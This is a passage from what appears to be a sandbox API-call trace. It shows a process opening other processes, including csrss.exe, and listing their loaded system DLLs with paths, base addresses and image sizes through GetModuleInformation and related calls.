GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0051.228] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0051.230] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x26318e8, cb=0x18 | out: lpmodinfo=0x26318e8*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0051.232] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0051.234] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0051.237] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9780000, lpmodinfo=0x2633ab8, cb=0x18 | out: lpmodinfo=0x2633ab8*(lpBaseOfDll=0x7fef9780000, SizeOfImage=0x21000, EntryPoint=0x7fef97903b0)) returned 1 [0051.239] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9780000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wmiutils.dll") returned 0xc [0051.241] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9780000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")) returned 0x25 [0051.243] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef2980000, lpmodinfo=0x2635ea8, cb=0x18 | out: lpmodinfo=0x2635ea8*(lpBaseOfDll=0x7fef2980000, SizeOfImage=0x1fa000, EntryPoint=0x7fef2994c9c)) returned 1 [0051.245] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef2980000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="cimwin32.dll") returned 0xc [0051.247] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef2980000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")) returned 0x25 [0051.250] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7780000, lpmodinfo=0x2638080, cb=0x18 | out: lpmodinfo=0x2638080*(lpBaseOfDll=0x7fef7780000, SizeOfImage=0x43000, EntryPoint=0x7fef77a1b50)) returned 1 [0051.252] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7780000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="framedynos.dll") returned 0xe [0051.254] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7780000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")) returned 0x22 [0051.257] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x263a250, cb=0x18 | out: lpmodinfo=0x263a250*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0051.259] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0051.261] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0051.264] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x263c410, cb=0x18 | out: lpmodinfo=0x263c410*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0051.266] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0051.269] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0051.271] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x263e5e0, cb=0x18 | out: lpmodinfo=0x263e5e0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0051.273] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0051.276] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0051.278] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x26407a0, cb=0x18 | out: lpmodinfo=0x26407a0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0051.281] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0051.283] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0051.286] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x2642960, cb=0x18 | out: lpmodinfo=0x2642960*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0051.288] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0051.291] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0051.293] GetModuleInformation (in: hProcess=0x218, hModule=0x72d10000, lpmodinfo=0x2644b30, cb=0x18 | out: lpmodinfo=0x2644b30*(lpBaseOfDll=0x72d10000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0051.296] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x72d10000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WMI.DLL") returned 0x7 [0051.299] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x72d10000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMI.DLL" (normalized: "c:\\windows\\system32\\wmi.dll")) returned 0x1b [0051.302] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x2646ce0, cb=0x18 | out: lpmodinfo=0x2646ce0*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0051.305] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0051.308] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0051.311] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x2648eb0, cb=0x18 | out: lpmodinfo=0x2648eb0*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0051.315] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0051.319] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0051.321] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9d0000, lpmodinfo=0x264b080, cb=0x18 | out: lpmodinfo=0x264b080*(lpBaseOfDll=0x7fefb9d0000, SizeOfImage=0x16000, EntryPoint=0x7fefb9d11a0)) returned 1 [0051.343] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="NETAPI32.DLL") returned 0xc [0051.347] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NETAPI32.DLL" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0051.350] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x264d268, cb=0x18 | out: lpmodinfo=0x264d268*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0051.353] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0051.356] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0051.359] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd570000, lpmodinfo=0x264f438, cb=0x18 | out: lpmodinfo=0x264f438*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0051.362] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd570000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0051.365] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd570000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0051.368] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x26515f8, cb=0x18 | out: lpmodinfo=0x26515f8*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0051.371] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0051.374] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0051.377] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb980000, lpmodinfo=0x26537b8, cb=0x18 | out: lpmodinfo=0x26537b8*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0051.380] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb980000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SAMCLI.DLL") returned 0xa [0051.383] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb980000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMCLI.DLL" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0051.386] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce60000, lpmodinfo=0x2655978, cb=0x18 | out: lpmodinfo=0x2655978*(lpBaseOfDll=0x7fefce60000, SizeOfImage=0x30000, EntryPoint=0x7fefce6194c)) returned 1 [0051.390] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce60000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="LOGONCLI.DLL") returned 0xc [0051.393] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce60000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LOGONCLI.DLL" (normalized: "c:\\windows\\system32\\logoncli.dll")) returned 0x20 [0051.396] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef2960000, lpmodinfo=0x2657b48, cb=0x18 | out: lpmodinfo=0x2657b48*(lpBaseOfDll=0x7fef2960000, SizeOfImage=0x12000, EntryPoint=0x7fef296aab8)) returned 1 [0051.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef2960000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="BROWCLI.DLL") returned 0xb [0051.402] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef2960000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\BROWCLI.DLL" (normalized: "c:\\windows\\system32\\browcli.dll")) returned 0x1f [0051.406] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3250000, lpmodinfo=0x2659d08, cb=0x18 | out: lpmodinfo=0x2659d08*(lpBaseOfDll=0x7fef3250000, SizeOfImage=0xa000, EntryPoint=0x7fef32531c8)) returned 1 [0051.409] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3250000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SCHEDCLI.DLL") returned 0xc [0051.412] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3250000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SCHEDCLI.DLL" (normalized: "c:\\windows\\system32\\schedcli.dll")) returned 0x20 [0051.415] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb330000, lpmodinfo=0x265bed8, cb=0x18 | out: lpmodinfo=0x265bed8*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0051.418] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb330000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="DSROLE.DLL") returned 0xa [0051.423] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb330000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DSROLE.DLL" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0051.427] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef28d0000, lpmodinfo=0x265e098, cb=0x18 | out: lpmodinfo=0x265e098*(lpBaseOfDll=0x7fef28d0000, SizeOfImage=0x8000, EntryPoint=0x7fef28d11a0)) returned 1 [0051.430] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef28d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINBRAND.dll") returned 0xc [0051.434] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef28d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINBRAND.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")) returned 0x20 [0051.437] GetModuleInformation (in: hProcess=0x218, hModule=0x72d00000, lpmodinfo=0x2660268, cb=0x18 | out: lpmodinfo=0x2660268*(lpBaseOfDll=0x72d00000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0051.440] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x72d00000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SECURITY.DLL") returned 0xc [0051.444] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x72d00000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SECURITY.DLL" (normalized: "c:\\windows\\system32\\security.dll")) returned 0x20 [0051.447] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2662438, cb=0x18 | out: lpmodinfo=0x2662438*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0051.450] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SECUR32.DLL") returned 0xb [0051.454] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SECUR32.DLL" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0051.458] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x26645f8, cb=0x18 | out: lpmodinfo=0x26645f8*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0051.461] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0051.465] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0051.469] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce00000, lpmodinfo=0x26667b8, cb=0x18 | out: lpmodinfo=0x26667b8*(lpBaseOfDll=0x7fefce00000, SizeOfImage=0x57000, EntryPoint=0x7fefce05e38)) returned 1 [0051.473] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce00000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="schannel.DLL") returned 0xc [0051.478] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce00000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\schannel.DLL" (normalized: "c:\\windows\\system32\\schannel.dll")) returned 0x20 [0051.482] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x2668988, cb=0x18 | out: lpmodinfo=0x2668988*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0051.486] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0051.490] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0051.493] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x266ab48, cb=0x18 | out: lpmodinfo=0x266ab48*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0051.497] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0051.500] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0051.504] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0e0000, lpmodinfo=0x266cd08, cb=0x18 | out: lpmodinfo=0x266cd08*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0051.508] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0051.511] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0051.515] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x266eec8, cb=0x18 | out: lpmodinfo=0x266eec8*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0051.519] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0051.523] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0051.531] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x218 [0051.532] EnumProcessModules (in: hProcess=0x218, lphModule=0x26728f0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x26728f0, lpcbNeeded=0x41eb20) returned 1 [0051.533] GetModuleInformation (in: hProcess=0x218, hModule=0x4a3d0000, lpmodinfo=0x2672b60, cb=0x18 | out: lpmodinfo=0x2672b60*(lpBaseOfDll=0x4a3d0000, SizeOfImage=0x6000, EntryPoint=0x4a3d1540)) returned 1 [0051.533] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x4a3d0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="csrss.exe") returned 0x9 [0051.534] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x4a3d0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe")) returned 0x1d [0051.534] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2674d58, cb=0x18 | out: lpmodinfo=0x2674d58*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.534] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.535] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.535] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd800000, lpmodinfo=0x2676f18, cb=0x18 | out: lpmodinfo=0x2676f18*(lpBaseOfDll=0x7fefd800000, SizeOfImage=0x13000, EntryPoint=0x7fefd807c30)) returned 1 [0051.536] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd800000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CSRSRV.dll") returned 0xa [0051.550] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd800000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSRSRV.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll")) returned 0x1e [0051.550] CoTaskMemFree (pv=0x782320) [0051.550] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd7e0000, lpmodinfo=0x2485300, cb=0x18 | out: lpmodinfo=0x2485300*(lpBaseOfDll=0x7fefd7e0000, SizeOfImage=0x11000, EntryPoint=0x7fefd7eb1ec)) returned 1 [0051.551] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd7e0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="basesrv.DLL") returned 0xb [0051.552] CoTaskMemFree (pv=0x782320) [0051.552] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd7e0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\basesrv.DLL" (normalized: "c:\\windows\\system32\\basesrv.dll")) returned 0x1f [0051.552] CoTaskMemFree (pv=0x782320) [0051.552] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd7a0000, lpmodinfo=0x24874c0, cb=0x18 | out: lpmodinfo=0x24874c0*(lpBaseOfDll=0x7fefd7a0000, SizeOfImage=0x38000, EntryPoint=0x7fefd7a27c0)) returned 1 [0051.553] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd7a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="winsrv.DLL") returned 0xa [0051.554] CoTaskMemFree (pv=0x782320) [0051.554] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd7a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winsrv.DLL" (normalized: "c:\\windows\\system32\\winsrv.dll")) returned 0x1e [0051.554] CoTaskMemFree (pv=0x782320) [0051.554] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24896d8, cb=0x18 | out: lpmodinfo=0x24896d8*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0051.555] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0051.556] CoTaskMemFree (pv=0x782320) [0051.556] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0051.557] CoTaskMemFree (pv=0x782320) [0051.557] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x248b898, cb=0x18 | out: lpmodinfo=0x248b898*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0051.557] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0051.558] CoTaskMemFree (pv=0x782320) [0051.558] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0051.559] CoTaskMemFree (pv=0x782320) [0051.559] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x248da58, cb=0x18 | out: lpmodinfo=0x248da58*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0051.560] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0051.561] CoTaskMemFree (pv=0x782320) [0051.561] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0051.562] CoTaskMemFree (pv=0x782320) [0051.562] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x248fc28, cb=0x18 | out: lpmodinfo=0x248fc28*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0051.563] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0051.564] CoTaskMemFree (pv=0x782320) [0051.564] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0051.565] CoTaskMemFree (pv=0x782320) [0051.565] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2491e90, cb=0x18 | out: lpmodinfo=0x2491e90*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0051.566] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0051.567] CoTaskMemFree (pv=0x782320) [0051.567] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0051.568] CoTaskMemFree (pv=0x782320) [0051.568] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2494040, cb=0x18 | out: lpmodinfo=0x2494040*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0051.570] 